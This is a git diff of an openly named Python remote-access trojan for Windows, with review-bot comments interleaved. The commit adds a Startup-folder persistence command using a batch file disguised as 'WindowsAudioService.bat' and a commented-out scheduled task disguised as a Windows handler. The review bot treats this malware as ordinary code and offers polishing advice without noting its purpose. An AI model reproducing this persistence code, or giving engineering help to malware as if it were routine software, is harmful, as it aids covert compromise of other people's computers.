diff --git a/.github/workflows/bandit.yml b/.github/workflows/bandit.yml
new file mode 100644
index 0000000..36a7f2b
--- /dev/null
+++ b/.github/workflows/bandit.yml
@@ -0,0 +1,52 @@
+# This workflow uses actions that are not certified by GitHub.
+# They are provided by a third-party and are governed by
+# separate terms of service, privacy policy, and support
+# documentation.
+
+# Bandit is a security linter designed to find common security issues in Python code.
+# This action will run Bandit on your codebase.
+# The results of the scan will be found under the Security tab of your repository.
+
+# https://github.com/marketplace/actions/bandit-scan is ISC licensed, by abirismyname
+# https://pypi.org/project/bandit/ is Apache v2.0 licensed, by PyCQA
+
+name: Bandit
+on:
+ push:
+ branches: [ "main" ]
+ pull_request:
+ # The branches below must be a subset of the branches above
+ branches: [ "main" ]
+ schedule:
+ - cron: '15 4 * * 3'
+
+jobs:
+ bandit:
+ permissions:
+ contents: read # for actions/checkout to fetch code
+ security-events: write # for github/codeql-action/upload-sarif to upload SARIF results
+ actions: read # only required for a private repository by github/codeql-action/upload-sarif to get the Action run status
+
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - name: Bandit Scan
+ uses: shundor/python-bandit-scan@9cc5aa4a006482b8a7f91134412df6772dbda22c
+ with: # optional arguments
+ # exit with 0, even with results found
+ exit_zero: true # optional, default is DEFAULT
+ # Github token of the repository (automatically created by Github)
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} # Needed to get PR information.
+ # File or directory to run bandit on
+ # path: # optional, default is .
+ # Report only issues of a given severity level or higher. Can be LOW, MEDIUM or HIGH. Default is UNDEFINED (everything)
+ # level: # optional, default is UNDEFINED
+ # Report only issues of a given confidence level or higher. Can be LOW, MEDIUM or HIGH. Default is UNDEFINED (everything)
+ # confidence: # optional, default is UNDEFINED
+ # comma-separated list of paths (glob patterns supported) to exclude from scan (note that these are in addition to the excluded paths provided in the config file) (default: .svn,CVS,.bzr,.hg,.git,__pycache__,.tox,.eggs,*.egg)
+ # excluded_paths: # optional, default is DEFAULT
+ # comma-separated list of test IDs to skip
+ # skips: # optional, default is DEFAULT
+ # path to a .bandit file that supplies command line arguments
+ # ini_path: # optional, default is DEFAULT
+
diff --git a/.github/workflows/manual.yml b/.github/workflows/manual.yml
new file mode 100644
index 0000000..eadcbbc
--- /dev/null
+++ b/.github/workflows/manual.yml
@@ -0,0 +1,30 @@
+# This is a basic workflow that is manually triggered
+
+name: Manual workflow
+
+# Controls when the action will run. Workflow runs when manually triggered using the UI
+# or API.
+on:
+ workflow_dispatch:
+ # Inputs the workflow accepts.
+ inputs:
+ name:
+ # Friendly description to be shown in the UI instead of 'name'
+ description: 'Dep Script Test'
+ # Default value if no value is explicitly provided
+ default: NO'
+ # Input has to be provided for the workflow to run
+ required: true
+
+# A workflow run is made up of one or more jobs that can run sequentially or in parallel
+jobs:
+ # This workflow contains a single job called "greet"
+ greet:
+ # The type of runner that the job will run on
+ runs-on: windows
+
+ # Steps represent a sequence of tasks that will be executed as part of the job
+ steps:
+ # Runs a single command using the runners shell
+ - name: Test Script
+ run:
diff --git a/LICENCE.txt b/LICENCE.txt
new file mode 100644
index 0000000..61ab961
--- /dev/null
+++ b/LICENCE.txt
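Review bot: `exit_zero: true` in the `with:` block of bandit.yml makes the Bandit step succeed even when it reports findings, so this workflow can never block a pull request; per the header comment, results only surface under the Security tab. If that is intended, say so next to the option, e.g. `# advisory only: findings never fail the check`; otherwise drop the option. Separately, `actions/checkout@v2` is referenced by a mutable tag while the Bandit action two lines below it is pinned to a full commit SHA. Pin checkout the same way (`actions/checkout@<full-commit-sha>`), since this job holds `security-events: write` and hands `GITHUB_TOKEN` to a third-party action.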
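Review bot: manual.yml cannot run as written: the final `run:` key has no command, which GitHub is likely to reject, and `runs-on: windows` is not a GitHub-hosted runner label, so the job would only start on a self-hosted runner carrying that label (the hosted label is `windows-latest`). `default: NO'` has a stray trailing quote that YAML keeps as part of the value; it was probably meant to be `default: 'NO'`. Unlike bandit.yml in the same commit, this workflow declares no `permissions:` block; adding `permissions:` with `contents: read` gives the manually dispatched job a minimal token.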
@@ -0,0 +1 @@ +This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. diff --git a/LICENSE b/LICENSE deleted file mode 100644 index e266dae..0000000 --- a/LICENSE +++ /dev/null @@ -1,21 +0,0 @@ -MIT License - -Copyright (c) 2022 FZGbzuw412 - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. diff --git a/README.md b/README.md index d44d550..701bbbc 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,7 @@ # Python-RAT + +THIS REPO IS ARCHIVED AND WILL NO LONGER BE UPDATED. + Advanced Remote Administration tool for Windows Systems written in pure Python ## Disclamer 
@@ -6,7 +9,7 @@ Advanced Remote Administration tool for Windows Systems written in pure Python THIS SOFTWARE IS INTENDED ONLY FOR EDUCATION PURPOSES! DO NOT USE IT TO INFLICT DAMAGE TO ANYONE! USING MY APPLICATION YOU ARE AUTHOMATICALLY AGREE WITH ALL RULES AND TAKE RESPONSIBITITY FOR YOUR ACTION! THE VIOLATION OF LAWS CAN CAUSE SERIOUS CONSEQUENCES! -THE DEVELOPER FZGbzuw412 ASSUMES NO LIABILITY AND IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE +THE DEVELOPER ASSUMES NO LIABILITY AND IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM. ## Intended for: 
@@ -57,23 +60,5 @@ client.pyw ![изображение](https://user-images.githubusercontent.com/92334349/151528715-c83b5d21-4df4-4143-acf4-a67907e180de.png) ## Licence - - Copyright (c) 2022 FZGbzuw412 - - Permission is hereby granted, free of charge, to any person obtaining a copy - of this software and associated documentation files (the "Software"), to deal - in the Software without restriction, including without limitation the rights - to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - copies of the Software, and to permit persons to whom the Software is - furnished to do so, subject to the following conditions: - - The above copyright notice and this permission notice shall be included in all - copies or substantial portions of the Software. - - THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - SOFTWARE. + +This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. diff --git a/SECURITY.md b/SECURITY.md new file mode 100644 index 0000000..4350bb0 --- /dev/null +++ b/SECURITY.md @@ -0,0 +1,5 @@ +# Security Policy + +## Reporting a Vulnerability + +Always Report Vulnerabilities In The Issues. Please Be Respectful When Reporting diff --git a/WindowsAudioService.bat b/WindowsAudioService.bat new file mode 100644 index 0000000..e670140 --- /dev/null +++ b/WindowsAudioService.bat 
@@ -0,0 +1 @@ +py "C:\Users\" \ No newline at end of file diff --git a/client.pyw b/client.pyw index 3ba0856..0a687e7 100644 --- a/client.pyw +++ b/client.pyw @@ -10,6 +10,7 @@ import shutil import glob import ctypes import sys +import os import webbrowser import re import pyautogui @@ -20,6 +21,8 @@ from pynput.keyboard import Listener from pynput.mouse import Controller import time import keyboard +import subprocess + user32 = ctypes.WinDLL('user32') kernel32 = ctypes.WinDLL('kernel32') @@ -599,6 +602,10 @@ User: {os.getlogin()} except: self.errorsend() + + elif command == 'AtStartup': + os.system('copy WindowsAudioService.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"') + elif command == 'exit': s.send(b"exit") break @@ -606,5 +613,26 @@ User: {os.getlogin()} rat = RAT_CLIENT('127.0.0.1', 4444) if __name__ == '__main__': + # Use triple quotes string literal to span PowerShell command multiline + #STR_CMD = """ + #$action = New-ScheduledTaskAction -Execute """ + sys.executable + """.exe -Argument """ + + """ + #$description = "" + #$settings = New-ScheduledTaskSettingsSet -RunOnlyIfNetworkAvailable + #$taskName = "Windows Remote Request Handler" + #$trigger = New-ScheduledTaskTrigger -AtStartup + #Register-ScheduledTask -TaskName $taskName -Description $description -Action $action -Settings $settings -Trigger $trigger | Out-Null + #""" + + # Use a list to make it easier to pass argument to subprocess + #listProcess = [ + # "powershell.exe", + # "-NoExit", + # "-NoProfile", + # "-Command", + # STR_CMD + #] + + # Enjoy the magic + #subprocess.run(listProcess, check=True) rat.build_connection() - rat.execute() \ No newline at end of file + rat.execute() diff --git a/client_requirements.txt b/client_requirements.txt index 55c8eab..164e72a 100644 --- a/client_requirements.txt +++ b/client_requirements.txt 
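Review bot: The file name WindowsAudioService.bat imitates a Windows system component, yet its single line `py "C:\Users\"` passes only a directory path to the Python launcher and names no script, so a reader cannot tell what the file is for. Give it a name that says what it starts and add a header line, for example `REM Starts the Python-RAT client at logon; delete this file to disable` (assuming that is the intent, as the `AtStartup` branch added to client.pyw in this commit suggests). That lets someone auditing a Startup folder attribute the entry and remove it. The file also ends without a trailing newline.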
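Review bot: The new `elif command == 'AtStartup':` branch changes the host's autostart configuration with no comment, no log entry and no documented way to undo it, and the README hunks in this commit do not mention the command. Add a comment above the `os.system` call naming the artifact it creates, for example `# persistence: copies WindowsAudioService.bat into the current user's Startup folder; delete that file to undo`, and record the same path in the README so an operator or responder can find and remove it. For monitoring, the observable is a shell `copy` spawned by the Python interpreter that writes a `.bat` into `...\Start Menu\Programs\Startup`. The enclosing command loop starts and ends outside the hunk.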
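Review bot: The lines added under `if __name__ == '__main__':` are about twenty lines of commented-out code, and `import subprocess` from the earlier hunk is referenced only inside that block, so the commit adds an unused import and dead text to the entry point. Delete the commented block and the import rather than keeping disabled code in place; version control already preserves it if it is ever needed. The comment `# Enjoy the magic` says nothing about what the code does and should go with it.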
@@ -3,4 +3,7 @@ comtypes pycaw pyautogui opencv-python -vidstream \ No newline at end of file +vidstream +comtypes +pynput +keyboard \ No newline at end of file diff --git a/installwithargs.bat b/installwithargs.bat new file mode 100644 index 0000000..fe8b478 --- /dev/null +++ b/installwithargs.bat @@ -0,0 +1,2 @@ +python -m pip install --trusted-host pypi.org --trusted-host files.pythonhosted.org -r client_requirements.txt +python -m pip install --trusted-host pypi.org --trusted-host files.pythonhosted.org -r server_requirements.txt \ No newline at end of file
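Review bot: `comtypes` is added in client_requirements.txt although the hunk header already shows `comtypes` as an earlier line of the file, so the package appears to be listed twice; drop the added line. All entries, including the new `pynput` and `keyboard`, are unpinned, so each install resolves whatever version is current at that moment. Pin them as `name==<version>` so the dependency set is reproducible and can be reviewed. The file still ends without a trailing newline.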
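Review bot: Both lines of installwithargs.bat pass `--trusted-host pypi.org --trusted-host files.pythonhosted.org`, which tells pip to accept those hosts without a valid HTTPS certificate, so anyone positioned on the network path could substitute packages during install. Remove the flags: `python -m pip install -r client_requirements.txt`. If they were added to get through a TLS-inspecting proxy, point pip at that proxy's CA with `--cert <path-to-ca-bundle>` instead. With the requirements files unpinned as well, nothing verifies what gets installed; pinned versions with `--require-hashes` would close that gap.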